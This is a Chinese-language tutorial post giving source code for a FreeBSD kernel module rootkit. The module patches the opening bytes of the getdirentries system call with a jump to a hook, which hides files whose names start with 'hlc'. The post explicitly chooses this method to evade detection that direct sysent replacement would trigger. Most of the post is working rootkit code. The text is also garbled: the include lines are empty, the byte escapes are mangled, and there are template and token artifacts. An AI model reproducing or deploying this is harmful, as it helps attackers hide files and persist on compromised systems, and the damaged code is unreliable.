不直接替换系统调用的kld

如果在sysent表里面直接替换系统调用,很容易被发现,我们可以通过改写系统调用的

前面几个字节(jmp 新的系统调用)来达到更好的隐藏效果,而不是直接替换系统调用.

下面的代码就是具体的实现:

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include
#include
#include

MALLOC_DEFINE(HLC_DIR,"dir","struct");

#define hidename "hlc"

#define hidelength 3

unsigned char new_call_code[7]="xb8x00x00x00x00"/* movl {GetProperty(Content)},%eax */

"xffxe0"; /* jmp *%eax */

unsigned char old_call_code[7];

static int filehide(char *name)

{

char buf[hidelength+1];

bcopy(name,buf,hidelength);

buf[hidelength]="";

if(!strcmp(buf,hidename))

return 1;

return 0;

}

static int new_getdirentries(struct proc *p,register struct getdirentries_args *uap)

{

int size,count;

struct dirent *dir,*current;

bcopy(old_call_code,sysent[SYS_getdirentries].sy_call, sizeof(old_call_code));

getdirentries(p,uap);

bcopy(new_call_code,sysent[SYS_getdirentries].sy_call, sizeof(new_call_code));

size=p->p_retval[0];

if(size>0)

{

MALLOC(dir,struct dirent *,size,HLC_DIR,M_NOWA99v);

copyin(uap->buf,dir,size);

current=dir;

count=size;

while((count>0)&&(current->d_reclen!=0))

{

count-=current->d_reclen;

if(filehide(current->d_name))

{

size-=current->d_reclen;

if(count!=0)

{

bcopy((char *)current+current->d_reclen,current,count);

}

continue;

}

if(count!=0)

current=(struct dirent *)((char *)current+current->d_reclen);

}

p->p_retval[0]=size;

copyout(dir,uap->buf,size);

free(dir,HLC_DIR);

}

return 0;

}

static int load( module_t *mod,int cmd,void *arg)

{

int error=0;

switch(cmd)

{

case MOD_LOAD:

{

*(long*)&new_call_code[1]=(long)new_getdirentries;

bcopy(sysent[SYS_getdirentries].sy_call,old_call_code, sizeof(old_call_code));

bcopy(new_call_code,sysent[SYS_getdirentries].sy_call, sizeof(new_call_code));

printf("install ok ");

break;

}

case MOD_UNLOAD:

{

bcopy(old_call_code,sysent[SYS_getdirentries].sy_call, sizeof(old_call_code));

break;

}

default:

{

error=EINVAL;

break;

}

}

return error;

}

static moduledata_t addjmp_mod={

"addjmp",

load,

NULL

};

DECLARE_MODULE(addjmp,addjmp_mod,SI_SUB_DRIVERS,SI_ORDER_MIDDLE);